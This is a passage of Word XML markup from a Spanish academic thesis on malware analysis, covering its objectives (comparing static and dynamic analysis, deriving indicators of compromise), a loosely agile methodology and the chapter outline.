        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26391E69" w14:textId="261DDD78" w:rsidR="00E95A92" w:rsidRDefault="003B49C0" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>O4 – Comparar los datos obtenidos en el análisis estático con los extraídos en la fase dinámica para confirmar el comportamiento esperado y extraer posibles diferencias en el caso de que estas sean identificadas</w:t>
      </w:r>
      <w:r w:rsidR="00C668B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206972F8" w14:textId="4E961BA2" w:rsidR="00C668B2" w:rsidRDefault="00C668B2" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r w:rsidR="003F57AD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="00233F32">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Obtener una serie de indicadores de compromiso y procedimientos que permitan identificar el malware en el caso de encontrarse este presente en un dispositivo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78507A7B" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1060"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4277C6CE" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>METODOLOGÍA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0812ABEC" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F5A4377" w14:textId="521B4B18" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="008F1075">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">El trabajo y la gestión del proyecto se llevarán a cabo siguiendo </w:t>
      </w:r>
      <w:r w:rsidR="004F5629">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">de manera aproximada </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la metodología </w:t>
      </w:r>
      <w:r w:rsidR="00C668B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ágil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00C668B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">también </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">conocida </w:t>
      </w:r>
      <w:r w:rsidR="00C668B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>como agile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C668B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, ya que, pese</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a que existe una clara demarcación entre algunas de las fases debido a su diferente naturaleza</w:t>
      </w:r>
      <w:r w:rsidR="00C668B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, no se trata de unidades aisladas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Los datos obtenidos en cada una de las etapas serán de ayuda en otras fases, permitiendo ampliar de manera continua el conocimiento acerca del funcionamiento del malware. </w:t>
      </w:r>
      <w:r w:rsidR="00C668B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El análisis estático y dinámico se complementarán</w:t>
      </w:r>
      <w:r w:rsidR="00092607">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> entre sí</w:t>
      </w:r>
      <w:r w:rsidR="00C668B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, aportando información que permitirá progresar</w:t>
      </w:r>
      <w:r w:rsidR="00092607">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> globalmente.</w:t>
      </w:r>
      <w:r w:rsidR="00C668B2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F5629">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">No obstante, es importante que no se ha seguido completamente </w:t>
      </w:r>
      <w:r w:rsidR="00E70C5F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">la modalidad </w:t>
      </w:r>
      <w:r w:rsidR="004F5629">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>con</w:t>
      </w:r>
      <w:r w:rsidR="004A063D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> bloques de trabajo (conocidos en el vocabulario agile como</w:t>
      </w:r>
      <w:r w:rsidR="004F5629">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> sprints</w:t>
      </w:r>
      <w:r w:rsidR="004A063D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="004F5629">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E70C5F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">claramente definidos y entregables al final de cada uno como </w:t>
      </w:r>
      <w:r w:rsidR="003774F2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>se indica</w:t>
      </w:r>
      <w:r w:rsidR="00E70C5F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> en algunas variantes de agile como puede ser Scrum. Las razones de esto son</w:t>
      </w:r>
      <w:r w:rsidR="003774F2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E70C5F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F5629">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>por un lado</w:t>
      </w:r>
      <w:r w:rsidR="003774F2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004F5629">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la dificultad de concretar plazos para ciertas tareas al tratarse de un proyecto que cuenta con un componente importante de investigación, y por lo tanto de varias incógnitas que impiden estimar </w:t>
      </w:r>
      <w:r w:rsidR="00E70C5F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">tiempos con una </w:t>
      </w:r>
      <w:r w:rsidR="004F5629">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>alta</w:t>
      </w:r>
      <w:r w:rsidR="00285C0E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> precisión</w:t>
      </w:r>
      <w:r w:rsidR="004F5629">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E42A3D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y,</w:t>
      </w:r>
      <w:r w:rsidR="004F5629">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por otro lado</w:t>
      </w:r>
      <w:r w:rsidR="003774F2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, debido</w:t>
      </w:r>
      <w:r w:rsidR="004F5629">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a la complejidad de compatibilizar el trabajo en el proyecto de </w:t>
      </w:r>
      <w:r w:rsidR="00E70C5F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">manera totalmente definida con el horario laboral del alumno. Sin embargo, se ha tratado en la medida de lo posible de seguir el modelo y su filosofía de </w:t>
      </w:r>
      <w:r w:rsidR="00FB2C6D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">adaptación a </w:t>
      </w:r>
      <w:r w:rsidR="00E70C5F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">cambios </w:t>
      </w:r>
      <w:r w:rsidR="0028677D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>e iteración frecuente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DB180D" w14:textId="11E005E1" w:rsidR="00E95A92" w:rsidRDefault="000A4492" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tras la planificación inicial, l</w:t>
      </w:r>
      <w:r w:rsidR="00E95A92">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">as etapas del proyecto </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>quedan definidas de la siguiente manera:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7436932B" w14:textId="0C769BD8" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Diseño de los análisis</w:t>
      </w:r>
      <w:r w:rsidR="003774F2">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y planificación de las fases que los compondrán</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB8E0C3" w14:textId="04D38DE4" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Realización de los análisis y pruebas</w:t>
      </w:r>
      <w:r w:rsidR="000A4492">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B939AB2" w14:textId="42F71C79" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Documentación de los resultados obtenidos</w:t>
      </w:r>
      <w:r w:rsidR="000A4492">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A249E6" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F9CEFA" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ESTRUCTURA DEL TRABAJO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E861F2B" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A668000" w14:textId="7EA90DB4" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00786A8D">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Esta memoria tiene una estructura dividida en capítulos</w:t>
      </w:r>
      <w:r w:rsidR="008D4823">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, y cuenta en su parte final con</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> anexos</w:t>
      </w:r>
      <w:r w:rsidR="008D4823">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> relativos a temas generales del proyecto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. A continuación, se muestra un listado de cada uno de ellos, así como una descripción detallada de los contenidos que componen cada ítem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09494F81" w14:textId="2CD76FA3" w:rsidR="00E95A92" w:rsidRPr="000E046D" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Introducción. Planteamiento del problema a resolver, resumen de objetivos, metodología de trabajo</w:t>
      </w:r>
      <w:r w:rsidR="004518E8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y presentación de la </w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>estructura de la memoria</w:t>
      </w:r>
      <w:r w:rsidR="004518E8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7BB09F" w14:textId="595067D4" w:rsidR="00E95A92" w:rsidRPr="000E046D" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Capítulo 1. </w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>Investigación previa</w:t>
      </w:r>
      <w:r w:rsidR="004518E8">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve"> realizada</w:t>
      </w:r>
      <w:r w:rsidR="008B3698">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>, estado del arte en la temática del proyecto</w:t>
      </w:r>
      <w:r w:rsidR="004518E8">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidR="00D43AF6">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve">el </w:t>
      </w:r>
      <w:r w:rsidR="004518E8">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>proceso de</w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve"> selección de</w:t>
      </w:r>
      <w:r w:rsidR="004518E8">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve">l </w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>malware a analizar</w:t>
      </w:r>
      <w:r w:rsidR="004518E8">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1033BCC6" w14:textId="4285DEDA" w:rsidR="00E95A92" w:rsidRPr="000E046D" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Capítulo 2. Planificación temporal</w:t>
      </w:r>
      <w:r w:rsidR="004518E8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> creada inicialmente</w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="004518E8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">junto con </w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>presupuestos,</w:t>
      </w:r>
      <w:r w:rsidR="004518E8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la</w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> gestión de riesgos</w:t>
      </w:r>
      <w:r w:rsidR="004518E8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y la</w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> materia de legislación</w:t>
      </w:r>
      <w:r w:rsidR="004518E8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> aplicable al proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDDB8D2" w14:textId="2F006C20" w:rsidR="00E95A92" w:rsidRPr="000E046D" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Capítulo 3. </w:t>
      </w:r>
      <w:r w:rsidR="001115C8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Organización de los análisis a realizar, siendo estos el a</w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">nálisis estático </w:t>
      </w:r>
      <w:r w:rsidR="001115C8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y el dinámico. Presentación del método de trabajo a utilizar durante la realización de las actividades</w:t>
      </w:r>
      <w:r w:rsidR="00E621C3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y posibles problemas a </w:t>
      </w:r>
      <w:r w:rsidR="00B123E0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>encontrar,</w:t>
      </w:r>
      <w:r w:rsidR="00E621C3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> así como soluciones o mitigaciones previstas</w:t>
      </w:r>
      <w:r w:rsidR="001115C8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D782C03" w14:textId="04CD3193" w:rsidR="000668A0" w:rsidRPr="000668A0" w:rsidRDefault="00E95A92" w:rsidP="000668A0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Capítulo 4. </w:t>
      </w:r>
      <w:r w:rsidR="00B46B86">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Presentación de los</w:t>
      </w:r>
      <w:r w:rsidR="00B46B86">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> r</w:t>
      </w:r>
      <w:r w:rsidR="001115C8">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve">esultados </w:t>
      </w:r>
      <w:r w:rsidR="00B46B86">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve">obtenidos </w:t>
      </w:r>
      <w:r w:rsidR="001115C8">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>a raíz de los análisis aplicados.</w:t>
      </w:r>
      <w:r w:rsidR="000668A0">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve"> Comparativa entre los resultados de las dos fases y corroboración de las coincidencias observadas, además de las diferencias que puedan producirse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743FF3F5" w14:textId="09FA46FF" w:rsidR="00E95A92" w:rsidRPr="000E046D" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Capítulo 5. </w:t>
      </w:r>
      <w:r w:rsidR="001115C8">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>Aportaciones realizadas a través de los resultados obtenidos</w:t>
      </w:r>
      <w:r w:rsidR="00735C24">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B46B86">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve"> al igual que comentario y contextualización de estos. En otro orden de cosas, también se hará una enumeración de</w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B46B86">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve">los </w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t>problemas encontrados</w:t>
      </w:r>
      <w:r w:rsidR="001115C8">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve"> durante la realización del proyecto, así como</w:t>
      </w:r>
      <w:r w:rsidRPr="000E046D">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve"> posibles futuras mejoras o ampliaciones</w:t>
      </w:r>
      <w:r w:rsidR="00B46B86">
        <w:rPr>
          <w:color w:val="202020"/>
        </w:rPr>
        <w:t xml:space="preserve"> a aplicar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547EE8ED" w14:textId="279D9118" w:rsidR="00E95A92" w:rsidRPr="000E046D" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
